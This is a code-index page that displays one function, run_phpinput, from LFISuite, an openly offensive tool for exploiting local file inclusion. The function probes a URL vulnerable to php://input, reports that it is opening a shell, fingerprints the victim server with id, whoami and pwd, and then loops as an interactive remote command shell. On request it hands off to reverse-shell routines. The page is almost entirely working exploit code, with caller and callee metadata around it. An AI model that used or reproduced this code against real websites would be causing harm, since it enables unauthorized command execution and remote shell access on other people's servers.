hub / github.com/D35m0nd142/LFISuite / run_phpinput

Function run_phpinput

lfisuite.py:1217–1277
()

Source from the content-addressed store, hash-verified

    return got[:-1]

def run_phpinput():
    global ahurl
    global ahactive
    global victimOs

    if(ahactive is False):
        inputurl = raw_input("[*] Enter the php://input vulnerable url (ex: 'http://site/index.php?page=') -> ")
    else:
        inputurl = ahurl

    inputurl = checkHttp(inputurl)
    inputurl = cutURLToLastEqual(inputurl)
    resp = send_phpinput_cmd("echo Bodom", inputurl)
    got = SubstrFind(resp,"AbracadabrA **")
    phpcmd = False

    if(len(got) == 0):
        return
    if("system() has been disabled for security reasons in" in resp):
        phpcmd = True

    point = got[0]+15
    print "\n[+] The website seems to be vulnerable. Opening a Shell.."

    if(phpcmd is False):
        _id = cleanOutput(extract_phpinput_res(send_phpinput_cmd("id",inputurl)), True)
        if(len(_id) == 0):
            path = cleanOutput(extract_phpinput_res(send_phpinput_cmd("path",inputurl)), True)
            if(checkIfWindows(path)):
                victimOs = "Windows"

        print colored("[If you want to send PHP commands rather than system commands add php:// before them (ex: php:// fwrite(fopen('a.txt','w'),\"content\");]\n","red")
        whoami = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("whoami",inputurl)), True))
        if(victimOs != "Windows"):
            pwd = cleanOutput(extract_phpinput_res(send_phpinput_cmd("pwd",inputurl)), True)
        else:
            pwd = cleanOutput(extract_phpinput_res(send_phpinput_cmd("cd",inputurl)), True)
    else:
        onlyPhpPrint()
        whoami = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("php://get_current_user();",inputurl)), True))
        pwd = isUnknown(cleanOutput(extract_phpinput_res(send_phpinput_cmd("php://getcwd();",inputurl)), True))

    time.sleep(1)
    inputmain = removeHttpFromWebsite(extractWebsiteFromUrl(inputurl))
    cmd = ""
    while(cmd != "exit" and cmd != "quit" and cmd != "php://exit" and cmd != "php://quit"):
        if(phpcmd):
            cmd = raw_input("%s@%s:%s$ PHP:// " %(whoami,inputmain,pwd))
            if(cmd[:6] != "php://"):
                cmd = "php://%s" %cmd
        else:
            cmd = raw_input("%s@%s:%s$ " %(whoami,inputmain,pwd))
        if(cmd != "exit" and cmd != "quit" and cmd != "php://exit" and cmd != "php://quit"):
            if(phpcmd is False and checkIfReverseShell(cmd)):
                if(victimOs != "Windows"):
                    phpinput_reverse_shell(inputurl)
                else:
                    windows_phpinput_reverse_shell(inputurl)

Callers 2

run_autoHack (Function) · 0.85
lfisuite.py (File) · 0.85

Calls 15

checkHttp (Function) · 0.85
cutURLToLastEqual (Function) · 0.85
send_phpinput_cmd (Function) · 0.85
SubstrFind (Function) · 0.85
cleanOutput (Function) · 0.85
extract_phpinput_res (Function) · 0.85
checkIfWindows (Function) · 0.85
isUnknown (Function) · 0.85
onlyPhpPrint (Function) · 0.85
removeHttpFromWebsite (Function) · 0.85
extractWebsiteFromUrl (Function) · 0.85
checkIfReverseShell (Function) · 0.85

Tested by

no test coverage detected